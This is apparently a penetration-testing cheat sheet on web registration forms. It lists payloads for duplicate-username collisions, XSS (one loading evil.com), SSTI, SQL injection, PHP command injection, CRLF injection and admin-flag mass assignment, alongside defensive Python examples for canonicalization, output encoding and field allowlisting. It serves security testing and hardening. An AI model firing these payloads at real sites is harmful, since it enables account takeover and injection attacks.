# Web Registration (Signup)

The registration mechanism itself might be vulnerable to compromise: weak uniqueness checks, unsafe handling of user-supplied names, and over-trusting request parameters are the usual weak points.

### Register with the Same Username/Email Address as Existing User <a href="#register-with-the-same-usernameemail-address-as-existing-user" id="register-with-the-same-usernameemail-address-as-existing-user"></a>

We might be able to register the same username/email address as an existing user. This may affect the web server, so be careful when testing.\
Here are examples of usernames to register.

```
admin
administrator
root
```

Alternatively, it’s worth trying various approaches to registration, since a weak uniqueness check may canonicalize or truncate the submitted value only after comparing it.

```
# Insert null byte
admin\0
admin%00

# Insert a space before username
 admin
%20admin

# Insert a space after username
admin 
admin%20

# Insert spaces around username
 admin 
%20admin%20

# Replace uppercase/lowercase
Admin
aDmIn

# Overflow (first find the maximum username length the application accepts)
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxadmin
```
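The variants above all succeed for the same reason: the application compares the raw submitted value against stored names but later stores, truncates or displays a normalized form that collides with an existing account. The following is an added example, not code from the original page, of a registration-side canonicalization check that closes each of the listed variants (NUL and other control characters, surrounding whitespace, case differences, over-long input). It goes slightly beyond the list by also applying Unicode NFKC normalization. `EXISTING_USERS` and `MAX_USERNAME_LENGTH` are constructed values for the example.

```python
import unicodedata

# Constructed sample of already-registered usernames, stored in canonical form.
# Hypothetical data for the example, not from any real system.
EXISTING_USERS = {"admin", "root", "administrator"}

# Assumed application limit for the example.
MAX_USERNAME_LENGTH = 32


def canonicalize_username(raw: str) -> str:
    """Return the canonical form of a submitted username, or raise ValueError.

    The canonical form is what gets stored AND what the uniqueness check runs
    against, so "Admin", " admin", "admin\\0" or an over-long prefix can never
    be registered alongside "admin".
    """
    if not isinstance(raw, str) or raw == "":
        raise ValueError("username is required")
    # Reject control characters outright (covers NUL, CR, LF, TAB). A stored NUL
    # can be silently truncated by C-based layers and then collide with "admin".
    if any(unicodedata.category(ch) == "Cc" for ch in raw):
        raise ValueError("control characters are not allowed")
    # Unicode compatibility normalization so look-alike encodings collapse
    # onto one spelling before comparison.
    name = unicodedata.normalize("NFKC", raw)
    # Strip surrounding whitespace, then refuse any whitespace that remains.
    name = name.strip()
    if any(ch.isspace() for ch in name):
        raise ValueError("whitespace is not allowed inside a username")
    # Case-fold so "Admin" and "aDmIn" both map onto "admin".
    name = name.casefold()
    # Enforce the length limit by rejecting, never by truncating: truncation
    # is exactly what lets "xxxx...admin" collapse onto an existing name.
    if len(name) > MAX_USERNAME_LENGTH:
        raise ValueError("username too long")
    # Restrict the character set; this also rejects still-encoded input such
    # as "admin%00" that a broken decoder might pass through literally.
    if not all(ch.isalnum() or ch in "._-" for ch in name):
        raise ValueError("username contains disallowed characters")
    return name


def check_registration(raw: str, existing=EXISTING_USERS):
    """Return (accepted, detail).

    detail is the canonical name when accepted, otherwise the rejection
    reason. Uniqueness is always evaluated on the canonical form.
    """
    try:
        name = canonicalize_username(raw)
    except ValueError as exc:
        return False, str(exc)
    if name in existing:
        return False, "username already taken"
    return True, name


if __name__ == "__main__":
    for candidate in ["Admin", " admin ", "admin\0", "x" * 49 + "admin", "john.doe"]:
        print(repr(candidate), "->", check_registration(candidate))
```

The key design choice is that the stored value and the compared value are the same string; any normalization that happens only on one side of the comparison reintroduces the collision.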

### Register Malicious Username/Email Address <a href="#register-malicious-usernameemail-address" id="register-malicious-usernameemail-address"></a>

#### XSS <a href="#xss" id="xss"></a>

We might be able to inject an XSS payload into the username during registration, which then fires wherever the application renders the name without encoding it.

```
john<script>alert(1)</script>
john</span><script>alert(1)</script>
john<iframe src=https://evil.com></iframe>

# Combine with overflow character length
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx<script>alert(1)</script>
```

#### SSTI <a href="#ssti" id="ssti"></a>

It’s worth trying **SSTI** payloads if the website uses frameworks/template engines such as **Flask, Pug, Angular, etc.** Register a username containing one of the following **SSTI** payloads.

```
{{2*3}}
{2*3}
${2*3}
2*3

{{ `<script>alert(1)</script>` }}
{% debug %}
```

#### SQLi <a href="#sqli" id="sqli"></a>

If the website queries database records using the username, we might be able to inject SQL through the username. Register a username containing one of the following **SQLi** payloads.

```
test' or 1=1--
test' or '1'='1'--

test' union select null,null--
test' union select null,null,null--
```

#### PHP Injection <a href="#php-injection" id="php-injection"></a>

```
john<?php echo system('id');?>
john<?php system('ping -c 1 10.0.0.1');?>
```

#### CRLF (%0d%0a) <a href="#crlf-0d0a" id="crlf-0d0a"></a>

Inserting a CRLF sequence (`%0d%0a`) after the username or email may cause unexpected behavior if the value is later written into an HTTP, SMTP or log header line.

```
username=john%0d%0a&password=mypassword123
email=attacker%40evil.com%0d%0a&password=mypassword123
```
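Both the XSS section above and this CRLF section come down to the same defensive rule: a registered name is untrusted data and must be encoded or validated for the context it is written into. The following is an added example, not code from the original page, that decodes a form body the way a server framework would (so `%0d%0a` becomes a real CR/LF), HTML-encodes the name for page output, and refuses rather than strips CR/LF before the value reaches a header line. The `render_greeting` and `header_value` helpers are hypothetical names for the example.

```python
import html
from urllib.parse import parse_qs


def parse_registration(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body.

    Percent-decoding happens here, exactly as the server framework would do
    it, so "john%0d%0a" arrives in application code as "john\\r\\n".
    """
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_greeting(username: str) -> str:
    """Build the HTML fragment that greets the user, HTML-encoding the name.

    html.escape turns <, >, &, " and ' into entities, so a name such as
    john<script>alert(1)</script> is displayed literally rather than parsed.
    """
    return '<span class="user">Welcome, ' + html.escape(username, quote=True) + "</span>"


def header_value(value: str) -> str:
    """Validate a value before it is placed in an HTTP, SMTP or log header line.

    Rejecting (instead of silently stripping) keeps the attempt visible to
    the caller and to whatever logs the resulting error.
    """
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in header value")
    return value


def header_check(value: str):
    """Return (ok, detail): the validated value, or the rejection reason."""
    try:
        return True, header_value(value)
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    form = parse_registration("username=john%0d%0a&password=mypassword123")
    print(repr(form["username"]), "->", header_check(form["username"]))
    print(render_greeting("john<script>alert(1)</script>"))
```

Note that Python's own `http.client` and `email.message` already refuse bare CR/LF in header values; the explicit check is still worthwhile at the boundary where the name is first accepted, so the rejection is logged as a registration failure rather than surfacing as an opaque error deep in the mail or response path.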

### Broken Access Control <a href="#broken-access-control" id="broken-access-control"></a>

We might be able to break the access restrictions on the target page by adding specific parameters to the registration request; if the server copies the submitted fields into the new user record without an allowlist (mass assignment), a privilege flag can be set at signup.

```
username=test&password=test&admin=true
username=test&password=test&isAdmin=true
username=test&password=test&admin=1
username=test&password=test&usertype=1
```
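The mitigation is to build the user record from an explicit allowlist of registration fields and to set role and privilege attributes server-side only. The following is an added example, not code from the original page, that shows the vulnerable pattern (copying every submitted field) beside the allowlisted one, and records the unexpected parameters so a detection rule can alert on registrations that carry `admin`, `isAdmin` or similar fields. `ALLOWED_FIELDS` is an assumed set for the example.

```python
import logging
from urllib.parse import parse_qs

# Assumed allowlist of fields a self-service registration may set.
ALLOWED_FIELDS = {"username", "password", "email"}


def _decode(form_body: str) -> dict:
    """Decode a form-urlencoded body into a flat dict (first value per key)."""
    return {k: v[0] for k, v in parse_qs(form_body, keep_blank_values=True).items()}


def build_new_user_vulnerable(form_body: str) -> dict:
    """Mass-assignment pattern: every submitted field becomes a record field.

    With "username=test&password=test&isAdmin=true" the record carries
    isAdmin="true" straight into storage. Kept here only to contrast with
    the allowlisted version below.
    """
    record = dict(_decode(form_body))
    record.setdefault("role", "user")  # only applied when the client omits it
    return record


def build_new_user(form_body: str):
    """Allowlisted construction of the user record.

    Returns (record, ignored_params). Only fields in ALLOWED_FIELDS are
    copied; the role is fixed server-side; any extra parameters are logged
    so attempts to set privilege fields show up in the application log.
    """
    params = _decode(form_body)
    record = {field: params[field] for field in ALLOWED_FIELDS if field in params}
    record["role"] = "user"  # never derived from client input
    # Password hashing before persistence is omitted for brevity.
    ignored = sorted(set(params) - ALLOWED_FIELDS)
    if ignored:
        logging.warning("registration sent unexpected fields: %s", ignored)
    return record, ignored


if __name__ == "__main__":
    body = "username=test&password=test&admin=true"
    print("vulnerable:", build_new_user_vulnerable(body))
    print("allowlisted:", build_new_user(body))
```

The `ignored` list is the detection hook: a registration that submits `admin`, `isAdmin`, `usertype` or any other field outside the form's own inputs is worth alerting on even when the allowlist already neutralizes it.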
